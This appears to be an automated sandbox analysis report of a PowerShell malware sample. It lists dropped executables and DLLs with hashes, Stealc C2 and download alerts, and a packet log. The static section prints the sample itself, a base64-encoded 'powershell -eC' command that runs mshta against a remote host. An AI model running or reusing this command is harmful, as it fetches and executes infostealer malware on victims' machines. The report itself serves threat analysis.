                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljj2orxh.414.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljwvbyc1.cj5.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqdhgaji.x02.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\0SmartAssem.exe

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                              Category:dropped
                              Size (bytes):14349824
                              Entropy (8bit):6.285808885259456
                              Encrypted:false
                              SSDEEP:98304:lFU3kOJpPTAGHhwaWHUNpG76mgW7IAiwBGrOFqTwEiPgIaWFyOZN/6xO:C9HhW0NpG7Rg2wOFqTJQgIaWsO
                              MD5:517C4A0A27D1C022A3319AF316407810
                              SHA1:70A976773A8C604EE8A22E50FFE372375B39E15B
                              SHA-256:97D308C2B061CA49A8834DFD527A1485442AAB95060AD69E54BF034E8A043C67
                              SHA-512:939DDB011DCC17DEBC691327EDD8ED1E90600C2D31AD828AF638C73E96EC82C598E6C19BD711B8ED95CF9004FD38E7D98229C2F7CCBEA3065ED85792BF40B265
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 18%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.2b....................@.............................`.......[....`... .........................................N................o..................P..................................(...................|...@............................text....0b......2b.................`.``.data....o...Pb..p...6b.............@.`..rdata....m...h...m...h.............@.`@.pdata.............................@.0@.xdata..D............V..............@.0@.bss....@.............................`..edata..N............d..............@.0@.idata...............f..............@.0..CRT....p............z..............@.@..tls.................|..............@.@..rsrc....o.......p...~..............@.0..reloc.......P......................@.0B................................................................................................................................

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6221
                              Entropy (8bit):3.7320113956637586
                              Encrypted:false
                              SSDEEP:96:CkWz33CxHolkvhkvCCtclFZpX7eHZlFZpX7THL:CksyIRgFZp2FZpz
                              MD5:BE45883BE1AEDEDE6460C3D20A0DD5A8
                              SHA1:C88CA79E6F65EC408F21DE15C55431AB015152FB
                              SHA-256:940BE881148060BA4BDCF6D2A2888AAFCBACFAB5C1E972EC004E8D708A64385B
                              SHA-512:252E22EAFEE5FCF7CC2096C6954E7EBE6F43597FEF3224158B496DE2E9FCC71A80AC22CF8E7A8E4DDFFC79103BF57B422BE9F8039BDDFFC2EE3E078F5D2ADA4A
                              Malicious:false
                              Preview:...................................FL..................F.".. ...-/.v....]. H...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....lJ`.H....z. H.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y<............................%..A.p.p.D.a.t.a...B.V.1......Y:...Roaming.@......CW.^.Y:............................ ..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y=...........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWS`..Windows.@......CW.^DWS`..........................i...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y=.....Q...........

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L775XEX050LL0E7YAOIM.temp

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6221
                              Entropy (8bit):3.7320113956637586
                              Encrypted:false
                              SSDEEP:96:CkWz33CxHolkvhkvCCtclFZpX7eHZlFZpX7THL:CksyIRgFZp2FZpz
                              MD5:BE45883BE1AEDEDE6460C3D20A0DD5A8
                              SHA1:C88CA79E6F65EC408F21DE15C55431AB015152FB
                              SHA-256:940BE881148060BA4BDCF6D2A2888AAFCBACFAB5C1E972EC004E8D708A64385B
                              SHA-512:252E22EAFEE5FCF7CC2096C6954E7EBE6F43597FEF3224158B496DE2E9FCC71A80AC22CF8E7A8E4DDFFC79103BF57B422BE9F8039BDDFFC2EE3E078F5D2ADA4A
                              Malicious:false
                              Preview:...................................FL..................F.".. ...-/.v....]. H...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....lJ`.H....z. H.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y<............................%..A.p.p.D.a.t.a...B.V.1......Y:...Roaming.@......CW.^.Y:............................ ..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y=...........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWS`..Windows.@......CW.^DWS`..........................i...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y=.....Q...........

                              C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):332992
                              Entropy (8bit):6.5543525498940065
                              Encrypted:false
                              SSDEEP:6144:Y08qkPN+UpD3lQCt2SI6JgEuA2GqWss4i+1gr7pGZmS0bZqXxtUPtYq5o5CT+CcN:Y0NsIUpDT2WgEjA/b
                              MD5:6615A634804DFA5071EFA1502EDA3A2B
                              SHA1:4AAAFC2F1018775B27A9305D01637437E127FCCF
                              SHA-256:056AB54B2A424D420637C2E44463813E7B3247222D7E907A1F34E22B1726AE95
                              SHA-512:19F48E08D8FB863E7387FC05B6F8A9C0B90E9FE86D5950F36265BBC746B20A723A9EDFD1E1C60BA1000B9934424A8F27EF3B5766BBE378373097A3384AAA0DB9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7f..V...V...V.......V..09...V..09...V..09...V..09...V..>...V..~&...V...V...R..~&...V..~&...V..~&...V...V...V..~&...V..Rich.V..........PE..d...%.l`.........." ................................................................(...............................................0>...q.......................&.......Z......P.......T.......................(...P...0...............( ...........................text...O........................... ..`.rdata..............................@..@.data................p..............@....pdata...&.......(...~..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\Qt5SqlVBox.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):224032
                              Entropy (8bit):6.519383044005073
                              Encrypted:false
                              SSDEEP:3072:gFgYgUFb6RWyLGttBrz7UVCoAsoRrXaZqb/Lh9VEyIXveGtGgCUF:CgzU5lyWcCoKr9/LhrEyIXveGtGcF
                              MD5:BBC454DFBD919CE1524E75478582C04D
                              SHA1:4A331B6DC29C28A0D4FBEF90225448B88FD2A6FD
                              SHA-256:EAA9EFDE1704FA6ABBEF9878EECFA386E89003F23E07ADCAF641A6C741893BA1
                              SHA-512:0A41EDB08378C6930BB6D6D6E951D550129DCB07886CFC636E28903C32B8DFE49124CFFC852BC9F93058D3679C4F775D70E9F869760F82A5AF54D9DCB303A013
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.[...[...[......[.~.Z...[...Z...[.~.^...[.~._...[.~.X...[.0.Z...[...Z...[.0.^...[.0.[...[.0....[......[.0.Y...[.Rich..[.........PE..d....l`.........." .........F......d........................................`......+{...............................................N...m..X...x....@...........'...... U...P..(...h...T.......................(.......0............................................text............................... ..`.rdata..2...........................@..@.data...............................@....pdata...'.......(..................@..@.rsrc........@......................@..@.reloc..(....P......................@..B........................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\VBoxSharedClipboard.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):69688
                              Entropy (8bit):6.51659434190219
                              Encrypted:false
                              SSDEEP:1536:B+yAXGB5LXoJG+pT42hujrgmCETk+n7M5x0:B1AWBxYl2tTk+nZ
                              MD5:A802413B13E45C7D526705CBD3974AE5
                              SHA1:2A9A4AC71150AF10718184FA283F7B8639685D57
                              SHA-256:9FDC76DA45016187D325B992B83980227112BA14ED1CB3A2DEA8929046163A13
                              SHA-512:41D6C870F387C84470E377E71EAB9BBCDEAB5F145BDF79C4ECE5C4825D7E9E74C88F6A81D53C87D83DD508A51203DDB8E95B2E425529CA67023C52DA1BDB3694
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ..................0...@.......https://www.virtualbox.org/ ....VirtualBox executable built for NT or later...$.......!..L.!VBoxa..%v..%v..%v......!v..,...!v.....'v..w...5v..w...-v..w...&v..%v..]v..w..."v..... v.....$v...z.$v.....$v..Rich%v..................PE..d....:.e.........." .....n...X.......s.....................................................A........................................0...\....................... .......8L.............T...........................0...8............................................text....l.......n.................. ..`.rdata...<.......>...r..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\VBoxSharedFolders.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):80104
                              Entropy (8bit):6.692796481442946
                              Encrypted:false
                              SSDEEP:1536:lBIMzx4IWhzEqAh+e/Zt+LJgKr6TuZ7CO7EO0ydGjIxU:UMaJzEqA7Z2gKr6TuZ7d7EO0J7
                              MD5:93F9F9335E95AEBD2C914971C9F6BC58
                              SHA1:88F31CD750004A830285FC25F4264E94C5A8496A
                              SHA-256:45B9BD24A786F5F9EAF3782F1C1D659FCCEE5E9B6AC941C756C43F09F0D10819
                              SHA-512:117B8A16B0D0AB2B70AEAB2C2375D0CE9CBC0D96F812E90DD1FB330AF4EE18EEDEC82007133F5A35B2055580CC2B780C547E57A96FA69993CCE7FF0EA111CB3A
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ..................0...@.......https://www.virtualbox.org/ ....VirtualBox executable built for NT or later...$.......!..L.!VBox...`Xe.3Xe.3Xe.3...2Ze.3Q.m3Ze.3...2Ze.3...2Se.3...2Pe.3...2\e.3Xe.34e.3...2[e.3...2^e.3...2Ye.3...3Ye.3...2Ye.3RichXe.3................PE..d....:.e.........." .........l...... ........................................@.............A............................................X...8...d.... ...................L...0..0...H...T...............................8...............@............................text.............................. ..`.rdata..`>.......@..................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..0....0......................@..B........................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\VBoxSupLib.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):22928
                              Entropy (8bit):7.128375733908998
                              Encrypted:false
                              SSDEEP:384:4XDxDEu03c+UHeMsxZB+FGs1DGiyZegiCAM+o/8E9VF0NywQB:k55F/1DGFnAMxkEN
                              MD5:9636CD28F536DD3FB438C866F28610A9
                              SHA1:AF0A1E853CF9ABFAD78E57063258AF7922726140
                              SHA-256:34E8BD19A7DD241A1275A3CF77A8A59A7DF1FC529F864F92D8548CC7E0429B26
                              SHA-512:9ED50BEC2DAFA8D759615B9CB79D1862A7BF7F947E8123D56C9D09E899B59127D892DAB66B23D8706DB3AC1472C4B06C85D2357EF996B65C54C4FD4A1FDD3C90
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                                Preview:MZ..................0...@.......https://www.virtualbox.org/ ....VirtualBox executable built for NT or later...$.......!..L.!VBoxY.....@...@...@..A...@...A...@...A...@...E...@...@...@...@...@.......@...B...@.Rich..@.........................PE..d...B:.e.........." ................@........................................P......................................................0"..T...."..<....@.......0...........I..........@ ..T............................................ ..@............................text............................... ..`.rdata....... ......................@..@.pdata.......0......................@..@.rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Roaming\VBoxVMM.dll

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):5158168
                                Entropy (8bit):5.277900307934323
                                Encrypted:false
                                SSDEEP:49152:WZ9hwg0+5rUYATyBtsP3kpbNAqW9He4avD4VE4NOhAJWrTHSScjLAWqYDadZLY7:HOrgyBDAqWle9G33A2Oi
                                MD5:DBFCDD86BDA68AB53D8B50329EF713F5
                                SHA1:3A89A0C2DAA71269E1797E1BBB9F6D65BC7DE381
                                SHA-256:DDEBDB740915CDB367C3ADF61D62F7B9CF1C7535CC8EDBB7D80C9B8ADD055AFA
                                SHA-512:A57C7EC2096A0368665F624FBF9A7574081F86F9F2E04D8A9405E67FCA7295FDE60CABB543A617C0DD3B48DFE52E0F458035BFF10D7C00F9358471ED5E5A1D4D
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Preview:MZ..................0...@.......https://www.virtualbox.org/ ....VirtualBox executable built for NT or later...$.......!..L.!VBox.\.z.=z).=z).=z)sO{(.=z).E.).=z).H~(.=z).H{(.=z).R.).=z).H.(.=z).H~(.=z).Hy(.=z).={).?z).H{(.=z).H.(:=z).=z).=z).Hz(.=z).H.).=z).Hx(.=z)Rich.=z)........PE..d....:.e.........." .....J ...-..... .........................................M.....&.N....A..........................................I.......J.......L......@K......JM..k....L.....h]H.T............................]H.8............` ..............................text...MI ......J ................. ..`.rdata....*..` ...*..N .............@..@.data...@....0K.......K.............@....pdata.......@K......$K.............@..@.rsrc.........L.......L.............@..@.reloc........L.......L.............@..B........................................................................................................................................................................................................................

                                C:\Users\user\AppData\Roaming\smart1.zip

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):7245419
                                Entropy (8bit):7.990049890250382
                                Encrypted:true
                                SSDEEP:196608:MSMjxkmxt+ui5tDAyyr4pF67C40b+a+jkE3F6G8slsY8/uDAvz/b5i:MVjxbt+uibcyOWoW40bV+fAG8Ot8/uks
                                MD5:FF248A4222851B97D522117737C68BE7
                                SHA1:5BE3C3B32D61134CB2380A9E15D1E0468DA39415
                                SHA-256:038FAD0CD10C3CF36E3640A2EA4C079F83C7F6133E400407773BF804BC1C5F49
                                SHA-512:59F4565F74B59DD09ECE6EF36CF7D40FC6A1D7D1AE0FA8D93BC35638B087EC066553414D239F99D146FA7CE018CED44C8DB95DD70918BDB1D56B936C7BF49C1C
                                Malicious:false
                                Preview:PK........p..X..).H..........Qt5PrintSupportVBox.dll.|{|.e..L...R'U....7hQ.J]....@..5.X@..*.+B.T.J.i.........wq."B).))m...^@..+.U)e-....9..d.........W2.....<.L.2..q......*8.....?+.q.....[.m...{..N~d..`..g...=...S.y..<d.Q8...T{..#.M{..II..*.........z....O.o......m..o.m.>q.........>{}.m...n...`....z.s.{.....V.....G.'#>..O..=87..tJ.V..]gO4]v5..0z.Du.i.g.=.....).~>6]...-$...q.....t...;.\.t..... ........-\...[i.c...yzp\.I.w/.._.)...|...4....s.v...{......$#..>0<............&W..M<...!g....D...e.[`...._.:...Qp..l.~..3f...8&........=4eZ>G2.T.+;......O...\.9..w.h%T..|l.Z..P.........u.;..;..C?....w.8) ..o...7C.@R.A..U.6..........o........`..Tv...vI>..O|....%.........h..q..(}.aL........@..}....%.__.~*.O.]..T.b...0...T........u.i.u..l..(..O...s..x...f.&Sa..<.....i..D..@.....%..ob.... ..K!.x`X*U.WJ..E..8*....a.....f..owI.+q.*6...Z..2".A......P._.P..:..+..Jt......8.K.\.2H.^Vh..0,.[#..o#.o...b'S>'..7..O .N...C..':$....ux...q..X.K..g......Z.....":Q...|

                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                Download File
                                Process:C:\Windows\System32\svchost.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):55
                                Entropy (8bit):4.306461250274409
                                Encrypted:false
                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                Malicious:false
                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                Static File Info

                                General

                                File type:ASCII text, with no line terminators
                                Entropy (8bit):4.305372738668802
                                TrID:
                                  File name:verification.b-cdn.net.ps1
                                  File size:139 bytes
                                  MD5:4c99ba8c0fcf994162c991b2b6601509
                                  SHA1:4790b36cdbbededed079473ff1c5c34637f2a2f6
                                  SHA256:8d80e5c7d07aef7d4565f4ddc61d3fc5819a5ea68f2d5282e6ae3e5e17d60e3d
                                  SHA512:7911fb9f45825b46a6ea43b96754147d8a0d0ab48eacb1169ee29bfcc8fe93ac28c6ba4eb3f62c1599ef425749447c946412d9ac1cfdedc72d73681447168e2c
                                  SSDEEP:3:VSJJLNyAmarBO/tmt55akqizkVkoTMRk8nbPROkJ+Eg9qYn:snyuk854kqizkVkiQfOkUE2
                                  TLSH:74C02B085038684D03DAE53008385D4F2103CB39D7381339EC4100C80D10184F31130C
                                  File Content Preview:powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==

                                  File Icon

                                  Icon Hash:3270d6baae77db44

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                  2024-08-10T19:10:37.251997+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in14974380192.168.2.4193.176.153.234
                                  2024-08-10T19:10:02.529769+0200TCP2026434ET MALWARE VBScript Redirect Style Exe File Download144349730185.93.1.250192.168.2.4

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 10, 2024 19:10:01.513389111 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:01.513431072 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:01.513499975 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:01.528223991 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:01.528255939 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.169756889 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.169826984 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.220813036 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.220834970 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.221333981 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.221393108 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.223481894 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.264503956 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.344274998 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.344333887 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.344350100 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.344362974 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.344393015 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.344422102 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.412301064 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.412334919 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.412373066 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.412405014 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.412422895 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.412429094 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.412457943 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.412487030 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.438540936 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.438597918 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.438632965 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.438659906 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.438683033 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.438711882 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.443073988 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.443136930 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.443156958 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.443166018 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.443201065 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.443212032 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.529860973 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.529918909 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.529939890 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.529958963 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.529974937 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.529995918 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.530924082 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.530982971 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.531009912 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.531014919 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.531091928 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.531410933 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.533588886 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.533622026 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.533663034 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.533668995 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.533693075 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.533721924 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.535445929 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.535468102 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.535521030 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.535527945 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.535556078 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.535573959 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.641370058 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.641443968 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.641489983 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.641510963 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.641525030 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.641604900 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.641612053 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.641634941 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.641664982 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.641689062 CEST44349730185.93.1.250192.168.2.4
                                  Aug 10, 2024 19:10:02.641689062 CEST49730443192.168.2.4185.93.1.250
                                  Aug 10, 2024 19:10:02.641712904 CEST44349730185.93.1.250192.168.2.4
